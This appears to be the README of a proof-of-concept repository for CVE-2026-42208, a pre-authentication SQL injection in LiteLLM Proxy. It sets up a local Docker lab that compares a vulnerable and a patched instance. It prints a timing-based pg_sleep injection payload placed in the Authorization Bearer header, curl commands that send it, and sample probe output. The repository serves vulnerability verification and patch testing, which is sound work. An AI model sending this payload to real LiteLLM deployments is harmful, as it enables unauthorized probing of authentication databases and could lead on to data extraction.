## https://sploitus.com/exploit?id=C1678F63-0F71-59B4-806B-BB9D20B8B702
# CVE-2026-42208 โ LiteLLM Pre-Auth SQL Injection Timing PoC
Local Docker lab and least-harm PoC for CVE-2026-42208, a pre-authentication SQL injection vulnerability in LiteLLM Proxy's API key verification path.
This repository demonstrates the difference between a vulnerable LiteLLM instance and a patched LiteLLM instance using a timing-based PostgreSQL `pg_sleep()` proof.
> Scope: local lab / authorized testing only. The default PoC does not dump database data and does not modify database data.
---
## Overview
CVE-2026-42208 affects LiteLLM Proxy versions `1.81.16` through versions before `1.83.7`.
The vulnerability is triggered through a crafted `Authorization: Bearer ...` header sent to a LiteLLM API endpoint. In affected versions, the caller-supplied token can reach a SQL query path during API key verification.
This lab compares:
| Service | Version | URL | Expected Result |
| --------- | ----------------: | ----------------------- | -------------------- |
| `vuln` | `v1.83.6-nightly` | `http://127.0.0.1:8081` | delayed 401 response |
| `patched` | `v1.83.7-stable` | `http://127.0.0.1:8082` | fast 401 response |
The proof uses a payload similar to:
```sql
' OR (SELECT pg_sleep(6)) IS NULL --
```
Both services should return HTTP `401`, but the vulnerable instance should take about 6 seconds to respond while the patched instance should respond quickly.
---
## Repository Structure
```text
.
โโโ docker-compose.yml
โโโ vuln/
โ โโโ Dockerfile
โ โโโ config.yaml
โโโ patched/
โ โโโ Dockerfile
โ โโโ config.yaml
โโโ poc/
โ โโโ poc.py
โโโ README.md
โโโ .gitignore
```
---
## Lab Architecture
```text
localhost:8081 -> vulnerable LiteLLM -> PostgreSQL db-vuln
localhost:8082 -> patched LiteLLM -> PostgreSQL db-patched
```
The PostgreSQL services are internal Docker services and are not exposed to the host.
Only LiteLLM HTTP ports are exposed:
| Host Port | Service | Container Port |
| --------: | ------------------ | -------------: |
| `8081` | vulnerable LiteLLM | `4000` |
| `8082` | patched LiteLLM | `4000` |
---
## Requirements
* Docker Desktop
* Docker Compose v2
* Python 3
---
## Start the Lab
```bash
docker compose up -d --build
```
Check service status:
```bash
docker compose ps
```
Expected status:
```text
db-vuln healthy
db-patched healthy
vuln healthy
patched healthy
```
---
## Run the PoC
Test the vulnerable instance:
```bash
python3 poc/poc.py --url http://127.0.0.1:8081
```
Test the patched instance:
```bash
python3 poc/poc.py --url http://127.0.0.1:8082
```
---
## PoC Options
```text
--url Target base URL
--path API path to test. Default: /v1/chat/completions
--sleep Seconds for pg_sleep(). Default: 6
--rounds Number of probe rounds. Default: 2
```
Examples:
```bash
python3 poc/poc.py --url http://127.0.0.1:8081 --sleep 3 --rounds 2
```
```bash
python3 poc/poc.py --url http://127.0.0.1:8081 --path /chat/completions
```
---
## Expected Output
Vulnerable instance:
```text
[*] target=http://127.0.0.1:8081
[*] path=/v1/chat/completions
[*] sleep=6
[*] rounds=2
[*] Running baseline request
[baseline] status=401 elapsed=0.041s body='...'
[*] Running timing probes
[probe] round=1 status=401 elapsed=6.048s body='...'
[probe] round=2 status=401 elapsed=6.033s body='...'
[*] Verdict
baseline=0.041s
probe_median=6.040s
delta=5.999s
result=LIKELY VULNERABLE
reason=crafted Authorization header caused a timing delay consistent with SQL evaluation
```
Patched instance:
```text
[*] target=http://127.0.0.1:8082
[*] path=/v1/chat/completions
[*] sleep=6
[*] rounds=2
[*] Running baseline request
[baseline] status=401 elapsed=0.025s body='...'
[*] Running timing probes
[probe] round=1 status=401 elapsed=0.030s body='...'
[probe] round=2 status=401 elapsed=0.013s body='...'
[*] Verdict
baseline=0.025s
probe_median=0.021s
delta=-0.004s
result=LIKELY PATCHED_OR_NOT_TRIGGERED
reason=no meaningful timing difference observed
```
---
## Evidence From Local Run
Example result from this lab:
```text
[probe] vuln round=1 status=401 elapsed=6.048s
[probe] vuln round=2 status=401 elapsed=6.033s
[probe] patched round=1 status=401 elapsed=0.030s
[probe] patched round=2 status=401 elapsed=0.013s
vuln: LIKELY VULNERABLE timing median=6.040s
patched: LIKELY PATCHED/NOT TRIGGERED timing median=0.021s
```
The important observation is that both services return `401`, but only the vulnerable service delays for approximately the `pg_sleep()` duration.
---
## Why Timing Proof Is Used
This repository uses a timing proof because it is safer than extracting data.
The PoC proves that the injected SQL expression is being evaluated by observing response delay. It does not attempt to dump database rows, extract API keys, modify records, or bypass authentication.
---
## Manual Timing Check
Vulnerable service:
```bash
time curl -sS -o /dev/null -w '%{http_code}\n' \
-X POST http://127.0.0.1:8081/v1/chat/completions \
-H "Authorization: Bearer ' OR (SELECT pg_sleep(6)) IS NULL --" \
-H "Content-Type: application/json" \
-d '{"model":"local-dummy","messages":[{"role":"user","content":"x"}]}'
```
Patched service:
```bash
time curl -sS -o /dev/null -w '%{http_code}\n' \
-X POST http://127.0.0.1:8082/v1/chat/completions \
-H "Authorization: Bearer ' OR (SELECT pg_sleep(6)) IS NULL --" \
-H "Content-Type: application/json" \
-d '{"model":"local-dummy","messages":[{"role":"user","content":"x"}]}'
```
Expected behavior:
```text
vulnerable -> approximately 6 seconds
patched -> near-immediate response
```
---
## Cleanup
```bash
docker compose down -v
```
This removes containers, network, and PostgreSQL volumes.
---
## Safety Notes
This lab is intended for local and authorized testing only.
Do not run the PoC against systems you do not own or do not have permission to test.
Do not use real provider API keys or production LiteLLM credentials in this lab.
The default PoC avoids destructive behavior and does not extract database contents.
---
## References
* [GitHub Security Advisory: GHSA-r75f-5x8p-qvmc](https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc)
* [NVD: CVE-2026-42208](https://nvd.nist.gov/vuln/detail/CVE-2026-42208)
* [CVE Record: CVE-2026-42208](https://vulners.com/cve/CVE-2026-42208)
* [LiteLLM Security Update: CVE-2026-42208 in LiteLLM Proxy](https://docs.litellm.ai/blog/cve-2026-42208-litellm-proxy-sql-injection)
* [Bishop Fox: CVE-2026-42208 โ Pre-Authentication SQL Injection in LiteLLM Proxy](https://bishopfox.com/blog/cve-2026-42208-pre-authentication-sql-injection-in-litellm-proxy)